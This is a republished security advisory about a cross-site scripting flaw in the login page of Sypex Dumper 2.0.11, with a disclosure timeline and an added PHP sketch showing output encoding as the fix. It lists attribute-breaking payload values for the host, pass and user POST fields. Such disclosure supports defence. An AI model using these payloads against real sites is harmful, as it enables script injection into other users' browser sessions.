###########################

# Sypex Dumper 2.0.11 Cross Site Scripting Vulnerability

###########################

Credits: John Page ( hyp3rlinx )
Domains: hyp3rlinx.altervista.org

Source:
http://hyp3rlinx.altervista.org/advisories/AS-SYPEX0529.txt

Vendor:
https://sypex.net


Product:
Sypex Dumper 2.0.11 is a PHP web based MySQL database management system.


Advisory Information:
================================================
Sypex Dumper 2.0.11 XSS Vulnerabilities

XSS

Vulnerability Details:
=====================
The login page input fields are vulnerable to XSS via the POST method,
allowing remote attackers to execute arbitrary code in the
context of a user's browser session.


Exploit code(s):
===============

host="onMouseOver="alert(666);
pass="onMouseOver="alert(666);
user="onMouseOver="alert(666);
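
Added example (not part of the original advisory and not Sypex Dumper source code): the values above only work when a POSTed field is written back into a double-quoted HTML attribute without encoding, so the sketch below puts that pattern beside the attribute-encoded form. All function names and the form markup are hypothetical; the sample request is constructed from the values listed in this advisory.

```php
<?php
// Added illustration, NOT Sypex Dumper code. Function names and the
// <input> markup are assumptions made for this example.

// Pattern that produces the issue: the submitted value is concatenated
// into a double-quoted attribute, so a leading " ends the attribute and
// the rest of the value is parsed as a new attribute on the element.
function field_unencoded(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '">';
}

// Encode for the HTML attribute context. ENT_QUOTES encodes both " and ',
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning ''.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened form: every dynamic piece goes through attr().
function field_encoded(string $name, string $value): string
{
    return '<input type="text" name="' . attr($name) . '" value="' . attr($value) . '">';
}

// A password value is never written back into the page at all.
function password_field(string $name): string
{
    return '<input type="password" name="' . attr($name) . '" value="">';
}

// Constructed sample POST body using the value from this advisory.
$sample = '"onMouseOver="alert(666);';
$post = ['host' => $sample, 'user' => $sample, 'pass' => $sample];

foreach (['host', 'user'] as $f) {
    echo "unencoded: ", field_unencoded($f, $post[$f]), "\n";
    echo "encoded:   ", field_encoded($f, $post[$f]), "\n";
    // Regression check: no raw quote may survive inside the attribute value.
    if (strpbrk(attr($post[$f]), "\"'") !== false) {
        throw new RuntimeException("raw quote left in encoded value for $f");
    }
}
echo "password:  ", password_field('pass'), "\n";
```

In the unencoded output the value attribute is closed immediately and the remainder becomes a separate attribute on the input element; in the encoded output the same bytes stay inside value as `&quot;` entities.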


Disclosure Timeline:
=========================================================


May 27, 2015: Vendor Notification
May 29, 2015: Public Disclosure



Severity Level:
=========================================================
Med


Description:
==========================================================

Request Method(s):
[+] POST

Vulnerable Product:
[+] Sypex Dumper 2.0.11

Vulnerable Parameter(s):
[+] host, pass, user

Affected Area(s):
[+] Login page

===============================================================

(hyp3rlinx)

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2015-06-12]

###########################